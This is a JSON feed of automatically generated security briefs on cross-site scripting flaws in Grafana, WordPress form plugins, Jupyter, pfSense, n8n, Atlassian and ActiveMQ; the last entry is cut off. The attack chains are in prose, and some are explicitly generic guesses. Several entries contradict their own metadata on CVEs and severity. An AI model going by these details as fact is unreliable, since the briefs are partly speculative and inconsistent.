{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/xss/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Grafana"],"_cs_severities":["medium"],"_cs_tags":["grafana","xss","information-disclosure","cloud"],"_cs_type":"advisory","_cs_vendors":["Grafana"],"content_html":"\u003cp\u003eGrafana is susceptible to multiple vulnerabilities that could allow unauthorized access and data compromise. A remote, anonymous attacker can exploit these weaknesses to perform Cross-Site Scripting (XSS) attacks or disclose sensitive information. This poses a risk to the confidentiality and integrity of Grafana instances and the data they manage. Defenders need to implement detection and mitigation measures to prevent potential exploitation. The specific Grafana versions affected are not specified in the advisory.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003cp\u003eSince the specific attack chain is not detailed in the source, a generic attack chain is provided based on common web application vulnerabilities:\u003c/p\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Grafana instance accessible over the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting a vulnerable endpoint in Grafana.\u003c/li\u003e\n\u003cli\u003eThis request exploits a Cross-Site Scripting (XSS) vulnerability, injecting malicious JavaScript code.\u003c/li\u003e\n\u003cli\u003eAlternatively, the request exploits an information disclosure vulnerability to access sensitive data.\u003c/li\u003e\n\u003cli\u003eIf XSS is successful, a user interacting with Grafana executes the injected JavaScript.\u003c/li\u003e\n\u003cli\u003eThe malicious script can steal user credentials, session tokens, or other sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to gain unauthorized access to Grafana.\u003c/li\u003e\n\u003cli\u003eThe attacker exfiltrates sensitive information or performs other malicious actions within the Grafana instance.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities can lead to the compromise of sensitive information, including user credentials, API keys, and internal system details. An attacker could leverage XSS to manipulate Grafana dashboards, inject malicious content, or redirect users to phishing sites. Information disclosure could expose sensitive configuration data or metrics, potentially leading to further attacks. The number of affected Grafana instances is currently unknown, but any publicly accessible instance is potentially at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eGrafana Suspicious URI Activity\u003c/code\u003e to detect potential exploitation attempts targeting Grafana instances via unusual URL patterns (log source: webserver).\u003c/li\u003e\n\u003cli\u003eEnable and review webserver logs for Grafana instances to identify suspicious activity, specifically cs-uri-query and cs-uri-stem (log source: webserver).\u003c/li\u003e\n\u003cli\u003eImplement a web application firewall (WAF) to filter out malicious requests and protect against common web application attacks, including XSS (log source: firewall).\u003c/li\u003e\n\u003cli\u003eUpgrade Grafana to the latest version as soon as security patches are available to address the identified vulnerabilities (affected_products: Grafana).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T09:54:33Z","date_published":"2026-05-04T09:54:33Z","id":"/briefs/2026-05-grafana-vulns/","summary":"Multiple vulnerabilities in Grafana allow a remote, anonymous attacker to conduct a Cross-Site Scripting attack or disclose information.","title":"Grafana Multiple Vulnerabilities Leading to XSS and Information Disclosure","url":"https://feed.craftedsignal.io/briefs/2026-05-grafana-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2025-14320"}],"_cs_exploited":false,"_cs_products":["Online Support Application (V3 through 31122025)"],"_cs_severities":["medium"],"_cs_tags":["xss","reflected-xss","cve-2025-14320"],"_cs_type":"advisory","_cs_vendors":["Tegsoft"],"content_html":"\u003cp\u003eA reflected cross-site scripting (XSS) vulnerability, identified as CVE-2025-14320, exists within the Tegsoft Management and Information Services Trade Limited Company Online Support Application. This vulnerability affects versions V3 through 31122025. An attacker can exploit this vulnerability by injecting malicious scripts into a web page, which is then reflected back to the user, leading to potential data theft, session hijacking, or website defacement. This vulnerability was reported by the Computer Emergency Response Team of the Republic of Turkey. Successful exploitation requires tricking a user into clicking a specially crafted link.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a JavaScript payload.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the crafted URL via email, social media, or other means.\u003c/li\u003e\n\u003cli\u003eUnsuspecting user clicks the malicious URL.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser sends a request to the vulnerable Tegsoft Online Support Application with the malicious script as a parameter.\u003c/li\u003e\n\u003cli\u003eThe Tegsoft application fails to properly sanitize the input.\u003c/li\u003e\n\u003cli\u003eThe application reflects the malicious script back to the user\u0026rsquo;s browser within the HTML response.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the malicious script.\u003c/li\u003e\n\u003cli\u003eThe script can then perform actions such as stealing cookies, redirecting the user to a phishing site, or defacing the web page.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this reflected XSS vulnerability can lead to the execution of arbitrary JavaScript code in the context of the victim\u0026rsquo;s browser. This can result in session hijacking, where an attacker gains unauthorized access to the user\u0026rsquo;s account. It can also lead to data theft, where sensitive information is stolen from the user\u0026rsquo;s browser. Furthermore, the attacker can redirect the user to a phishing website or deface the Online Support Application, potentially impacting multiple users.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply available patches or updates from Tegsoft to address CVE-2025-14320 on the Online Support Application.\u003c/li\u003e\n\u003cli\u003eImplement proper input validation and output encoding to prevent XSS vulnerabilities in the application based on CWE-79.\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect potential XSS attempts in web server logs.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of clicking on suspicious links to mitigate the initial access vector.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T09:15:59Z","date_published":"2026-05-04T09:15:59Z","id":"/briefs/2024-01-tegsoft-xss/","summary":"CVE-2025-14320 is a reflected cross-site scripting (XSS) vulnerability in Tegsoft Online Support Application versions V3 through 31122025, allowing attackers to inject arbitrary web scripts into user browsers.","title":"Tegsoft Online Support Application Reflected XSS Vulnerability (CVE-2025-14320)","url":"https://feed.craftedsignal.io/briefs/2024-01-tegsoft-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5063"}],"_cs_exploited":false,"_cs_products":["NEX-Forms – Ultimate Forms Plugin for WordPress plugin \u003c= 9.1.11"],"_cs_severities":["medium"],"_cs_tags":["wordpress","xss","stored-xss","cve-2026-5063"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe NEX-Forms – Ultimate Forms Plugin for WordPress, versions up to and including 9.1.11, is susceptible to a stored Cross-Site Scripting (XSS) vulnerability (CVE-2026-5063). This flaw stems from inadequate input sanitization and output escaping within the \u003ccode\u003esubmit_nex_form()\u003c/code\u003e function. Unauthenticated attackers can exploit this vulnerability by injecting malicious JavaScript code through POST parameter key names. Successful exploitation allows the attacker to execute arbitrary scripts in the context of a user\u0026rsquo;s browser when they access a page containing the injected script, potentially leading to session hijacking, defacement, or redirection to malicious sites. The vulnerability was reported to Wordfence and a patch has been released.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request to a WordPress page that utilizes the vulnerable NEX-Forms plugin.\u003c/li\u003e\n\u003cli\u003eThe POST request includes specially crafted parameter key names designed to inject JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esubmit_nex_form()\u003c/code\u003e function processes the POST request without properly sanitizing or escaping the malicious input.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript code is stored in the WordPress database.\u003c/li\u003e\n\u003cli\u003eA legitimate user accesses a page where the form data, including the malicious script, is displayed.\u003c/li\u003e\n\u003cli\u003eThe stored JavaScript code executes within the user\u0026rsquo;s browser in the context of the WordPress page.\u003c/li\u003e\n\u003cli\u003eThe attacker can then perform actions such as stealing cookies, redirecting the user, or modifying the page content.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this stored XSS vulnerability allows an unauthenticated attacker to inject arbitrary JavaScript code into pages using the NEX-Forms plugin. This can lead to various malicious outcomes, including user session hijacking, website defacement, or redirection to phishing sites. As the vulnerability is stored, every user who visits a page containing the malicious script will be affected until the vulnerability is patched and the malicious input is removed. The severity is rated as HIGH with a CVSS base score of 7.2.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the NEX-Forms – Ultimate Forms Plugin for WordPress to a version beyond 9.1.11 to patch CVE-2026-5063.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious NEX-Forms POST Requests\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests containing potentially malicious JavaScript code in parameter names.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-03T06:15:57Z","date_published":"2026-05-03T06:15:57Z","id":"/briefs/2026-05-wordpress-nex-forms-xss/","summary":"The NEX-Forms WordPress plugin is vulnerable to stored XSS via POST parameter key names, allowing unauthenticated attackers to inject arbitrary web scripts.","title":"NEX-Forms WordPress Plugin Vulnerable to Stored Cross-Site Scripting (CVE-2026-5063)","url":"https://feed.craftedsignal.io/briefs/2026-05-wordpress-nex-forms-xss/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-5113"}],"_cs_exploited":false,"_cs_products":["Gravity Forms plugin \u003c= 2.10.0"],"_cs_severities":["medium"],"_cs_tags":["xss","wordpress","gravityforms","cve-2026-5113","stored-xss"],"_cs_type":"advisory","_cs_vendors":["WordPress"],"content_html":"\u003cp\u003eThe Gravity Forms plugin for WordPress, a popular form builder, contains a stored cross-site scripting (XSS) vulnerability identified as CVE-2026-5113. This flaw affects versions up to and including 2.10.0. The vulnerability stems from a flawed state validation mechanism combined with insufficient output escaping within the Consent field\u0026rsquo;s hidden inputs. An unauthenticated attacker can exploit this by injecting malicious JavaScript code into form entries. This malicious code is then executed when an authenticated administrator accesses the Entries List page within the WordPress administration panel, potentially leading to account compromise or other malicious actions performed within the administrator\u0026rsquo;s session. Successful exploitation allows attackers to execute arbitrary web scripts in the context of an administrator\u0026rsquo;s browser.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker crafts a malicious payload containing XSS code within a Gravity Forms Consent field. The payload leverages HTML tags like \u003ccode\u003e\u0026lt;svg\u0026gt;\u003c/code\u003e that \u003ccode\u003ewp_kses()\u003c/code\u003e will strip.\u003c/li\u003e\n\u003cli\u003eThe attacker submits the crafted form entry to the WordPress site.\u003c/li\u003e\n\u003cli\u003eThe Gravity Forms plugin\u0026rsquo;s state validation mechanism calculates two hashes: one for the raw input and another after sanitization via \u003ccode\u003ewp_kses()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDue to the nature of the XSS payload, the \u003ccode\u003ewp_kses()\u003c/code\u003e function strips the \u003ccode\u003e\u0026lt;svg\u0026gt;\u003c/code\u003e tag, resulting in a matching hash for the sanitized input.\u003c/li\u003e\n\u003cli\u003eThe flawed validation logic fails to detect the malicious intent because at least one hash matches the original state, allowing the malicious raw value (containing the XSS payload) to be stored in the database.\u003c/li\u003e\n\u003cli\u003eAn authenticated administrator logs into the WordPress administration panel.\u003c/li\u003e\n\u003cli\u003eThe administrator navigates to the Entries List page for the affected Gravity Form.\u003c/li\u003e\n\u003cli\u003eThe stored malicious consent label is retrieved from the database and output without proper escaping, causing the XSS payload to execute within the administrator\u0026rsquo;s browser session.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5113 allows unauthenticated attackers to execute arbitrary web scripts within the context of an authenticated administrator\u0026rsquo;s browser session. This can lead to a variety of malicious outcomes, including account compromise, data theft, modification of website content, or further propagation of the attack to other administrative users. The severity of the impact depends on the privileges held by the compromised administrator account.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Gravity Forms plugin to the latest version, which includes a fix for CVE-2026-5113.\u003c/li\u003e\n\u003cli\u003eImplement a Web Application Firewall (WAF) rule to filter out requests containing potentially malicious XSS payloads targeting the Gravity Forms Consent field.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity related to form submissions containing encoded or obfuscated JavaScript code. Analyze HTTP request parameters for unusual characters or patterns indicative of XSS attempts.\u003c/li\u003e\n\u003cli\u003eEnable output escaping on form entries to prevent stored XSS attacks.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-02T06:16:04Z","date_published":"2026-05-02T06:16:04Z","id":"/briefs/2026-05-gravityforms-xss/","summary":"The Gravity Forms plugin for WordPress is vulnerable to stored cross-site scripting (XSS) via Consent field hidden inputs, allowing unauthenticated attackers to inject arbitrary web scripts that execute when an administrator views the entries list page.","title":"Gravity Forms Plugin Stored XSS Vulnerability (CVE-2026-5113)","url":"https://feed.craftedsignal.io/briefs/2026-05-gravityforms-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["@jupyter-notebook/help-extension","notebook","jupyterlab","@jupyterlab/help-extension","Jupyter Notebook"],"_cs_severities":["high"],"_cs_tags":["xss","jupyter","authentication","account-takeover","vulnerability"],"_cs_type":"advisory","_cs_vendors":["Jupyter","NVIDIA"],"content_html":"\u003cp\u003eA stored Cross-Site Scripting (XSS) vulnerability has been identified in Jupyter Notebook and JupyterLab, impacting versions 7.0.0 through 7.5.5 of Jupyter Notebook and versions up to 4.5.6 of JupyterLab. Discovered by Daniel Teixeira of the NVIDIA AI Red Team, this flaw allows an attacker to craft malicious notebook files containing XSS payloads embedded within the command linker functionality. When a user opens and interacts with these files, the injected script executes, potentially stealing the user\u0026rsquo;s authentication token. Successful exploitation grants the attacker full control over the user\u0026rsquo;s Jupyter account, enabling them to read, modify, and create files, execute arbitrary code via running kernels, and establish shell access through created terminals. This vulnerability poses a significant risk to data confidentiality, integrity, and system availability.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious Jupyter Notebook file containing a stored XSS payload within the command linker functionality.\u003c/li\u003e\n\u003cli\u003eThe attacker distributes the malicious notebook file to a target user (e.g., via email, shared repository, or compromised website).\u003c/li\u003e\n\u003cli\u003eThe victim opens the malicious notebook file in a vulnerable version of Jupyter Notebook or JupyterLab.\u003c/li\u003e\n\u003cli\u003eThe victim interacts with a seemingly legitimate control element within the notebook that is, in fact, part of the XSS payload.\u003c/li\u003e\n\u003cli\u003eThe injected XSS code executes in the victim\u0026rsquo;s browser, stealing their authentication token.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen authentication token to authenticate to the Jupyter REST API.\u003c/li\u003e\n\u003cli\u003eThe attacker gains complete control over the victim\u0026rsquo;s Jupyter account.\u003c/li\u003e\n\u003cli\u003eThe attacker performs malicious actions, such as reading files, modifying files, executing arbitrary code, or creating terminals for shell access.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability enables complete account takeover, allowing attackers to read, modify, and create files, access running kernels and execute arbitrary code, and create terminals for shell access within the victim\u0026rsquo;s Jupyter environment. This can lead to data exfiltration, code injection, and potential compromise of sensitive information stored within the Jupyter Notebook environment. Given the widespread use of Jupyter Notebook in data science, machine learning, and research environments, this vulnerability can have far-reaching consequences for individuals and organizations relying on these tools.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately upgrade Jupyter Notebook to version 7.5.6 or later, and JupyterLab to version 4.5.7 or later to patch CVE-2026-40171.\u003c/li\u003e\n\u003cli\u003eApply the workaround to disable the help extension via CLI as specified in the advisory to mitigate the vulnerability until patching is possible.\u003c/li\u003e\n\u003cli\u003eImplement the hardening measure by disabling the command linker functionality via \u003ccode\u003eoverrides.json\u003c/code\u003e to prevent XSS attacks, referencing the configuration details in the advisory.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Jupyter Notebook CommandLinker XSS Attempt\u0026rdquo; to detect potential exploitation attempts based on specific HTTP request characteristics.\u003c/li\u003e\n\u003cli\u003eEducate users about the risks of opening untrusted Jupyter Notebook files and interacting with potentially malicious content.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T17:25:47Z","date_published":"2026-04-30T17:25:47Z","id":"/briefs/2024-01-30-jupyter-xss/","summary":"A stored Cross-Site Scripting (XSS) vulnerability in Jupyter Notebook versions 7.0.0 through 7.5.5 and JupyterLab versions up to 4.5.6 allows attackers to steal authentication tokens by tricking users into interacting with malicious notebook files, leading to complete account takeover via the Jupyter REST API.","title":"Jupyter Notebook Authentication Token Theft via CommandLinker XSS","url":"https://feed.craftedsignal.io/briefs/2024-01-30-jupyter-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["pfSense CE (\u003c= 2.8.1)","pfSense Plus (\u003c= 26.03)"],"_cs_severities":["medium"],"_cs_tags":["xss","vulnerability","pfSense"],"_cs_type":"advisory","_cs_vendors":["Netgate"],"content_html":"\u003cp\u003eA vulnerability has been discovered in Netgate\u0026rsquo;s pfSense products. This vulnerability, a cross-site scripting (XSS) flaw, can be exploited by an attacker to inject arbitrary web scripts into a trusted website. The vulnerability affects pfSense CE versions 2.8.1 and earlier, as well as pfSense Plus versions 26.03 and earlier. The CERT-FR advisory was published on April 30, 2026, referencing Netgate security bulletin pfSense-SA-26_05, dated April 29, 2026. Successful exploitation of this vulnerability could allow an attacker to execute malicious code in the context of a user\u0026rsquo;s browser, potentially leading to session hijacking, defacement, or redirection to malicious sites.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable pfSense CE or Plus instance (\u0026lt;=2.8.1 or \u0026lt;=26.03 respectively).\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious URL containing a cross-site scripting payload.\u003c/li\u003e\n\u003cli\u003eThe URL is delivered to a targeted pfSense user, typically via phishing or social engineering.\u003c/li\u003e\n\u003cli\u003eThe user clicks the malicious link while authenticated to the pfSense web GUI.\u003c/li\u003e\n\u003cli\u003eThe pfSense web application fails to properly sanitize the attacker\u0026rsquo;s input.\u003c/li\u003e\n\u003cli\u003eThe malicious XSS payload is reflected back to the user\u0026rsquo;s browser.\u003c/li\u003e\n\u003cli\u003eThe user\u0026rsquo;s browser executes the attacker-supplied JavaScript code.\u003c/li\u003e\n\u003cli\u003eThe attacker gains control of the user\u0026rsquo;s session or redirects the user to a malicious site.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of the XSS vulnerability in Netgate pfSense could allow an attacker to execute arbitrary code in a user\u0026rsquo;s browser, potentially leading to session hijacking and unauthorized access to the pfSense system. While the number of affected installations is not specified, pfSense is widely used in small to medium-sized businesses as a firewall and routing solution. A successful attack could compromise network security, leading to data breaches, service disruption, or further lateral movement within the network.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the security patches outlined in Netgate\u0026rsquo;s security bulletin pfSense-SA-26_05 to remediate the XSS vulnerability on all affected pfSense CE (\u0026lt;= 2.8.1) and pfSense Plus (\u0026lt;= 26.03) instances.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Suspicious URI Access to pfSense Web GUI\u0026rdquo; to identify potential XSS exploitation attempts targeting the pfSense web interface.\u003c/li\u003e\n\u003cli\u003eEducate users about the dangers of clicking suspicious links, especially those received via email or other untrusted sources, to mitigate phishing attacks that could lead to XSS exploitation (Attack Chain step 3).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T00:00:00Z","date_published":"2026-04-30T00:00:00Z","id":"/briefs/2026-05-netgate-xss/","summary":"A cross-site scripting (XSS) vulnerability affects Netgate pfSense CE (\u003c= 2.8.1) and pfSense Plus (\u003c= 26.03), potentially allowing attackers to inject malicious code.","title":"Netgate pfSense XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-netgate-xss/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["n8n"],"_cs_severities":["high"],"_cs_tags":["xss","oauth","n8n","CVE-2026-42235"],"_cs_type":"advisory","_cs_vendors":["npm"],"content_html":"\u003cp\u003en8n, a workflow automation platform, is susceptible to a cross-site scripting (XSS) vulnerability (CVE-2026-42235) related to the registration of malicious MCP OAuth clients. An unauthenticated attacker can register an OAuth client with a crafted \u003ccode\u003eclient_name\u003c/code\u003e containing malicious JavaScript. This vulnerability exists in versions prior to 2.14.2 and also affects versions 2.17.0 to 2.17.3 and 2.18.0. A successful exploit allows the attacker to execute arbitrary JavaScript within a victim\u0026rsquo;s authenticated n8n session, potentially leading to credential theft, session token theft, workflow manipulation, or privilege escalation. Defenders should prioritize patching to version 2.14.2 or later to mitigate the risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn unauthenticated attacker registers a malicious MCP OAuth client with a crafted \u003ccode\u003eclient_name\u003c/code\u003e containing XSS payload.\u003c/li\u003e\n\u003cli\u003eA victim user navigates to the n8n instance and is presented with the malicious OAuth consent dialog.\u003c/li\u003e\n\u003cli\u003eThe victim user authorizes the malicious OAuth client, unknowingly injecting the attacker\u0026rsquo;s script into their session.\u003c/li\u003e\n\u003cli\u003eA second user, possibly an administrator, revokes the OAuth access granted to the malicious client.\u003c/li\u003e\n\u003cli\u003eThis revocation triggers a toast notification to the original victim user.\u003c/li\u003e\n\u003cli\u003eThe toast notification renders the attacker\u0026rsquo;s injected script from the crafted \u003ccode\u003eclient_name\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe victim user clicks on the link within the toast notification.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes within the victim\u0026rsquo;s authenticated n8n browser session, enabling the attacker to perform malicious actions such as stealing credentials, manipulating workflows, or escalating privileges.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this XSS vulnerability can lead to significant compromise of an n8n instance. Attackers can steal user credentials and session tokens, allowing them to impersonate legitimate users. Malicious actors could also modify or create workflows, leading to data breaches, system disruption, or unauthorized access. Privilege escalation is also possible, potentially granting attackers administrative control over the n8n platform. The number of potential victims depends on the exposure and user base of the vulnerable n8n instances.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade n8n to version 2.14.2 or later to patch CVE-2026-42235, as recommended in the advisory.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious n8n MCP OAuth Client Registration\u003c/code\u003e to identify attempts to register OAuth clients with suspicious names.\u003c/li\u003e\n\u003cli\u003eIf immediate patching is not feasible, restrict access to the n8n instance and the MCP OAuth registration endpoint to trusted users only, as suggested in the advisory\u0026rsquo;s workaround.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T21:25:44Z","date_published":"2026-04-29T21:25:44Z","id":"/briefs/2026-05-n8n-xss-oauth/","summary":"n8n is vulnerable to cross-site scripting (XSS) via a malicious MCP OAuth client, allowing an unauthenticated attacker to inject arbitrary JavaScript into an authenticated user's session.","title":"n8n MCP OAuth Client XSS Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-05-n8n-xss-oauth/"},{"_cs_actors":[],"_cs_cves":[{"id":"CVE-2026-21571"}],"_cs_exploited":false,"_cs_products":["Bamboo","Bitbucket","Confluence","Jira"],"_cs_severities":["critical"],"_cs_tags":["atlassian","vulnerability","code-execution","xss"],"_cs_type":"advisory","_cs_vendors":["Atlassian"],"content_html":"\u003cp\u003eMultiple vulnerabilities exist in Atlassian\u0026rsquo;s Bamboo, Bitbucket, Confluence, and Jira products. While specific CVEs are not detailed in this advisory, the potential impact is significant. An attacker exploiting these vulnerabilities could achieve arbitrary code execution, allowing for complete system compromise. They could also bypass security measures, potentially disabling logging or other security controls. Data manipulation and disclosure could lead to sensitive information compromise and unauthorized modifications. Cross-site scripting (XSS) attacks could be leveraged to steal user credentials or perform actions on behalf of unsuspecting users. Defenders need to ensure the Atlassian suite is fully patched and monitored.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Access:\u003c/strong\u003e An attacker identifies a vulnerable Atlassian product instance (Bamboo, Bitbucket, Confluence, or Jira) accessible over the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eVulnerability Exploitation:\u003c/strong\u003e The attacker leverages an unknown vulnerability to inject malicious code into the application, possibly through a crafted HTTP request.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCode Execution:\u003c/strong\u003e The injected code executes within the context of the Atlassian application, allowing the attacker to run arbitrary commands on the server.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePrivilege Escalation:\u003c/strong\u003e The attacker leverages the initial code execution to escalate privileges, potentially gaining root or administrator access.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDefense Evasion:\u003c/strong\u003e The attacker attempts to disable security logging or other monitoring mechanisms to avoid detection.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Manipulation/Exfiltration:\u003c/strong\u003e The attacker accesses sensitive data stored within the Atlassian application or connected databases, manipulating or exfiltrating it for malicious purposes.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e Using compromised credentials or established footholds, the attacker moves laterally to other systems within the network.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eImpact:\u003c/strong\u003e The attacker achieves their final objective, such as deploying ransomware, stealing intellectual property, or disrupting business operations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities could result in significant damage, including complete compromise of Atlassian servers, data breaches, and disruption of critical business processes. The number of potential victims is substantial, as these Atlassian products are widely used across various industries. The impact ranges from data loss and financial damage to reputational harm and legal liabilities.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rules provided in this brief to detect potential exploitation attempts targeting Atlassian products.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity, especially HTTP requests targeting Atlassian applications, to detect potential vulnerability exploitation.\u003c/li\u003e\n\u003cli\u003eEnable and review audit logs within Atlassian products (Bamboo, Bitbucket, Confluence, Jira) for suspicious activity.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a successful breach originating from a compromised Atlassian server.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-28T08:31:27Z","date_published":"2026-04-28T08:31:27Z","id":"/briefs/2026-04-atlassian-vulns/","summary":"Multiple vulnerabilities in Atlassian Bamboo, Bitbucket, Confluence, and Jira allow attackers to execute arbitrary code, bypass security measures, manipulate data, disclose information, or perform cross-site scripting attacks.","title":"Multiple Vulnerabilities in Atlassian Products","url":"https://feed.craftedsignal.io/briefs/2026-04-atlassian-vulns/"},{"_cs_actors":[],"_cs_cves":[{"cvss":4.3,"id":"CVE-2026-33227"},{"cvss":8.8,"id":"CVE-2026-34197"},{"cvss":7.5,"id":"CVE-2026-40046"},{"cvss":7.5,"id":"CVE-2026-39304"},{"cvss":8.8,"id":"CVE-2026-40466"}],"_cs_exploited":false,"_cs_products":["ActiveMQ"],"_cs_severities":["critical"],"_cs_tags":["activemq","rce","xss","apache"],"_cs_type":"advisory","_cs_vendors":["Apache"],"content_html":"\u003cp\u003eMultiple vulnerabilities in Apache ActiveMQ allow a remote, authenticated attacker to execute arbitrary code or perform cross-site scripting (XSS) attacks. While specific CVEs and attack vectors are not detailed in this advisory, the presence of both RCE and XSS vulnerabilities suggests a high risk to organizations using affected versions of ActiveMQ. Exploitation requires authentication, implying that attackers may need to compromise credentials or exploit other vulnerabilities to gain initial access. This combination of vulnerabilities could lead to complete system compromise, data theft, or service disruption. The lack of specific version information makes it crucial for organizations to identify and patch all potentially vulnerable ActiveMQ instances.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Access: The 